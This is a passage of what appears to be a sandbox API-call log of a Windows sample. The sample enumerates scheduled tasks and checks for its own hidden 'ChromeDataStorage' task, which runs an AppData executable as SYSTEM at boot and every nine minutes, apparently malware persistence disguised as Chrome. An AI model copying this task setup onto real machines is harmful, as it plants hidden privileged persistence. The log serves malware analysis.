<StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>"
	[0098.170] lstrcmpW (lpString1="ChromeDataStorage", lpString2="ChromeDataStorage") returned 0
	[0098.170] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0.0</Version>\r\n    <Author>AuthorName</Author>\r\n    <Description>Chrome Data Storage</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT9M</Interval>\r\n        <Duration>P415DT14H23M</Duration>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2019-05-14T15:31:33</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n      <UserId>SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="SYSTEM") returned="SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>"
	[0098.190] IUnknown:Release (This=0x632340) returned 0x0
	[0098.190] IRegisteredTaskCollection:get_Item (in: This=0x6322c8, index=0x12907c*(varType=0x3, wReserved1=0x63, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x632340) returned 0x0
	[0098.190] IRegisteredTask:get_Name (in: This=0x632340, pName=0x129184 | out: pName=0x129184*="GoogleUpdateTaskMachineCore") returned 0x0
	[0098.190] IRegisteredTask:get_Xml (in: This=0x632340, pXml=0x12918c | out: pXml=0x12918c*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x37\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0
	[0098.194] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x37\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.236] IUnknown:Release (This=0x632340) returned 0x0
	[0098.236] IRegisteredTaskCollection:get_Item (in: This=0x6322c8, index=0x12907c*(varType=0x3, wReserved1=0x63, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x632340) returned 0x0
	[0098.236] IRegisteredTask:get_Name (in: This=0x632340, pName=0x129184 | out: pName=0x129184*="GoogleUpdateTaskMachineUA") returned 0x0
	[0098.236] IRegisteredTask:get_Xml (in: This=0x632340, pXml=0x12918c | out: pXml=0x12918c*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65